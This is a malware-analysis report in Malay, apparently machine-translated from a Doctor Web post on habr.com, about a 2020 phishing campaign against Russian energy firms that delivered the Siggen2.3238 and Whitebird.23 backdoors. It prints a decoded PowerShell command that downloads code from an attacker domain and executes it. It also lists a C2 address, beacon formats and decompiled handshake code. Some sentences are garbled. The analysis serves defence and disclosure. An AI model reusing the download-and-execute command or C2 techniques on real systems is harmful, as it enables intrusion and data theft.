Pengalaman kami dalam menyiasat insiden keselamatan komputer menunjukkan bahawa e-mel masih merupakan salah satu saluran paling biasa digunakan oleh penyerang untuk mula-mula menembusi infrastruktur rangkaian yang diserang. Satu tindakan cuai dengan surat yang mencurigakan (atau tidak begitu mencurigakan) menjadi titik masuk untuk jangkitan selanjutnya, itulah sebabnya penjenayah siber secara aktif menggunakan kaedah kejuruteraan sosial, walaupun dengan tahap kejayaan yang berbeza-beza.
Dalam siaran ini, kami ingin bercakap tentang penyiasatan kami baru-baru ini terhadap kempen spam yang menyasarkan beberapa perusahaan dalam kompleks bahan api dan tenaga Rusia. Semua serangan mengikuti senario yang sama menggunakan e-mel palsu, dan tiada siapa yang nampaknya telah berusaha keras ke dalam kandungan teks e-mel ini.
Perkhidmatan perisikan
Semuanya bermula pada penghujung April 2020, apabila penganalisis virus Doctor Web mengesan kempen spam di mana penggodam menghantar direktori telefon yang dikemas kini kepada pekerja beberapa perusahaan di kompleks bahan api dan tenaga Rusia. Sudah tentu, ini bukan satu keprihatinan yang mudah, kerana direktori itu tidak nyata dan dokumen .docx memuat turun dua imej daripada sumber jauh.
Salah satu daripadanya telah dimuat turun ke komputer pengguna daripada pelayan berita[.]zannews[.]com. Perlu diperhatikan bahawa nama domain adalah serupa dengan domain pusat media antirasuah Kazakhstan - zannews[.]kz. Sebaliknya, domain yang digunakan serta-merta mengingatkan satu lagi kempen 2015 yang dikenali sebagai TOPNEWS, yang menggunakan pintu belakang ICEFOG dan mempunyai domain kawalan Trojan dengan subrentetan "berita" dalam nama mereka. Satu lagi ciri menarik ialah apabila menghantar e-mel kepada penerima yang berbeza, permintaan untuk memuat turun imej menggunakan sama ada parameter permintaan yang berbeza atau nama imej yang unik.
Kami percaya bahawa ini dilakukan untuk tujuan mengumpul maklumat untuk mengenal pasti penerima yang "boleh dipercayai", yang kemudiannya akan dijamin untuk membuka surat itu pada masa yang tepat. Protokol SMB digunakan untuk memuat turun imej dari pelayan kedua, yang boleh dilakukan untuk mengumpul cincang NetNTLM daripada komputer pekerja yang membuka dokumen yang diterima.
Dan inilah surat itu sendiri dengan direktori palsu:
Pada bulan Jun tahun ini, penggodam mula menggunakan nama domain baharu, sports[.]manhajnews[.]com, untuk memuat naik imej. Analisis menunjukkan bahawa subdomain manhajnews[.]com telah digunakan dalam mel spam sejak sekurang-kurangnya September 2019. Salah satu sasaran kempen ini ialah universiti besar Rusia.
Juga, menjelang Jun, penganjur serangan itu menghasilkan teks baharu untuk surat mereka: kali ini dokumen itu mengandungi maklumat tentang pembangunan industri. Teks surat itu jelas menunjukkan bahawa pengarangnya sama ada bukan penutur asli bahasa Rusia, atau sengaja mencipta kesan sedemikian tentang dirinya. Malangnya, idea pembangunan industri, seperti biasa, ternyata hanya penutup - dokumen itu sekali lagi memuat turun dua imej, manakala pelayan ditukar kepada memuat turun[.]inklingpaper[.]com.
Inovasi seterusnya diikuti pada bulan Julai. Dalam percubaan untuk memintas pengesanan dokumen berniat jahat oleh program antivirus, penyerang mula menggunakan dokumen Microsoft Word yang disulitkan dengan kata laluan. Pada masa yang sama, penyerang memutuskan untuk menggunakan teknik kejuruteraan sosial klasik - pemberitahuan ganjaran.
Teks rayuan itu sekali lagi ditulis dalam gaya yang sama, yang menimbulkan syak wasangka tambahan di kalangan penerima. Pelayan untuk memuat turun imej juga tidak berubah.
Ambil perhatian bahawa dalam semua kes, peti mel elektronik yang didaftarkan pada domain mel[.]ru dan yandex[.]ru digunakan untuk menghantar surat.
Serang
Menjelang awal September 2020, sudah tiba masanya untuk bertindak. Penganalisis virus kami merekodkan gelombang serangan baharu, di mana penyerang sekali lagi menghantar surat dengan alasan mengemas kini direktori telefon. Walau bagaimanapun, kali ini lampiran itu mengandungi makro yang berniat jahat.
Apabila membuka dokumen yang dilampirkan, makro mencipta dua fail:
- Skrip VBS %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, yang bertujuan untuk melancarkan fail kelompok;
- Fail kelompok itu sendiri %APPDATA%configstest.bat, yang telah dikelirukan.
Intipati kerjanya adalah untuk melancarkan cangkerang Powershell dengan parameter tertentu. Parameter yang dihantar ke shell dinyahkodkan kepada arahan:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Seperti berikut daripada arahan yang dibentangkan, domain dari mana muatan dimuat turun sekali lagi menyamar sebagai tapak berita. Yang mudah , yang tugas tunggalnya adalah untuk menerima shellcode daripada pelayan arahan dan kawalan dan melaksanakannya. Kami dapat mengenal pasti dua jenis pintu belakang yang boleh dipasang pada PC mangsa.
Pintu Belakang.Siggen2.3238
Yang pertama ialah Pintu Belakang.Siggen2.3238 β pakar kami tidak pernah temui sebelum ini, dan juga tiada sebutan mengenai program ini oleh vendor antivirus lain.
Program ini ialah pintu belakang yang ditulis dalam C++ dan berjalan pada sistem pengendalian Windows 32-bit.
Pintu Belakang.Siggen2.3238 mampu berkomunikasi dengan pelayan pengurusan menggunakan dua protokol: HTTP dan HTTPS. Sampel yang diuji menggunakan protokol HTTPS. Ejen Pengguna berikut digunakan dalam permintaan kepada pelayan:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Dalam kes ini, semua permintaan dibekalkan dengan set parameter berikut:
%s;type=%s;length=%s;realdata=%send
di mana setiap baris %s digantikan oleh:
- ID komputer yang dijangkiti,
- jenis permintaan yang dihantar,
- panjang data dalam medan realdata,
- data.
Pada peringkat mengumpul maklumat mengenai sistem yang dijangkiti, pintu belakang menjana garisan seperti:
lan=%s;cmpname=%s;username=%s;version=%s;
di mana lan ialah alamat IP komputer yang dijangkiti, cmpname ialah nama komputer, nama pengguna ialah nama pengguna, versi ialah baris 0.0.4.03.
Maklumat dengan pengecam sysinfo ini dihantar melalui permintaan POST kepada pelayan kawalan yang terletak di https[:]//31.214[.]157.14/log.txt. Jika sebagai tindak balas Pintu Belakang.Siggen2.3238 menerima isyarat HEART, sambungan dianggap berjaya, dan pintu belakang memulakan kitaran utama komunikasi dengan pelayan.
Penerangan yang lebih lengkap tentang prinsip operasi Pintu Belakang.Siggen2.3238 ada dalam kita .
Pintu Belakang.Whitebird.23
Program kedua ialah pengubahsuaian pintu belakang BackDoor.Whitebird, yang telah kami ketahui daripada insiden dengan agensi kerajaan di Kazakhstan. Versi ini ditulis dalam C++ dan direka bentuk untuk dijalankan pada kedua-dua sistem pengendalian Windows 32-bit dan 64-bit.
Seperti kebanyakan program jenis ini, Pintu Belakang.Whitebird.23 direka untuk mewujudkan sambungan yang disulitkan dengan pelayan kawalan dan kawalan tanpa kebenaran bagi komputer yang dijangkiti. Dipasang ke dalam sistem yang terjejas menggunakan penitis .
Sampel yang kami periksa ialah perpustakaan berniat jahat dengan dua eksport:
- Google Play
- Ujian.
Pada permulaan kerjanya, ia menyahsulit konfigurasi yang disambungkan ke dalam badan pintu belakang menggunakan algoritma berdasarkan operasi XOR dengan bait 0x99. Konfigurasi kelihatan seperti:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Untuk memastikan operasi berterusannya, pintu belakang menukar nilai yang dinyatakan dalam medan jam bekerja konfigurasi. Medan mengandungi 1440 bait, yang mengambil nilai 0 atau 1 dan mewakili setiap minit setiap jam dalam sehari. Mencipta benang berasingan untuk setiap antara muka rangkaian yang mendengar antara muka dan mencari paket kebenaran pada pelayan proksi daripada komputer yang dijangkiti. Apabila paket sedemikian dikesan, pintu belakang menambah maklumat tentang pelayan proksi ke senarainya. Selain itu, semak kehadiran proksi melalui WinAPI InternetQueryOptionW.
Program ini menyemak minit dan jam semasa dan membandingkannya dengan data di lapangan jam bekerja konfigurasi. Jika nilai untuk minit yang sepadan pada hari itu bukan sifar, maka sambungan diwujudkan dengan pelayan kawalan.
Mewujudkan sambungan ke pelayan mensimulasikan penciptaan sambungan menggunakan protokol TLS versi 1.0 antara klien dan pelayan. Badan pintu belakang mengandungi dua penampan.
Penampan pertama mengandungi paket TLS 1.0 Client Hello.
Penimbal kedua mengandungi paket TLS 1.0 Client Key Exchange dengan panjang kunci 0x100 bait, Change Cipher Spec, Encrypted Handshake Message.
Apabila menghantar paket Hello Pelanggan, pintu belakang menulis 4 bait masa semasa dan 28 bait data rawak pseudo dalam medan Rawak Pelanggan, dikira seperti berikut:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Paket yang diterima dihantar ke pelayan kawalan. Respons (paket Hello Server) menyemak:
- pematuhan protokol TLS versi 1.0;
- surat-menyurat cap masa (4 bait pertama medan paket Data Rawak) yang ditentukan oleh pelanggan kepada cap masa yang ditentukan oleh pelayan;
- padanan 4 bait pertama selepas cap masa dalam medan Data Rawak pelanggan dan pelayan.
Dalam kes padanan yang ditentukan, pintu belakang menyediakan paket Pertukaran Kunci Pelanggan. Untuk melakukan ini, ia mengubah suai Kunci Awam dalam pakej Pertukaran Kunci Pelanggan, serta Penyulitan IV dan Data Penyulitan dalam pakej Mesej Jabat Tangan Disulitkan.
Pintu belakang kemudian menerima paket daripada pelayan arahan dan kawalan, menyemak bahawa versi protokol TLS ialah 1.0, dan kemudian menerima 54 bait lagi (badan paket). Ini melengkapkan persediaan sambungan.
Penerangan yang lebih lengkap tentang prinsip operasi Pintu Belakang.Whitebird.23 ada dalam kita .
Kesimpulan dan Kesimpulan
Analisis dokumen, perisian hasad dan infrastruktur yang digunakan membolehkan kami mengatakan dengan yakin bahawa serangan itu disediakan oleh salah satu kumpulan APT China. Memandangkan kefungsian pintu belakang yang dipasang pada komputer mangsa sekiranya serangan berjaya, jangkitan membawa, sekurang-kurangnya, kepada kecurian maklumat sulit daripada komputer organisasi yang diserang.
Di samping itu, senario yang sangat mungkin ialah pemasangan Trojan khusus pada pelayan tempatan dengan fungsi khas. Ini boleh jadi pengawal domain, pelayan mel, gerbang Internet, dsb. Seperti yang dapat kita lihat dalam contoh , pelayan sedemikian amat menarik minat penyerang atas pelbagai sebab.
Sumber: www.habr.com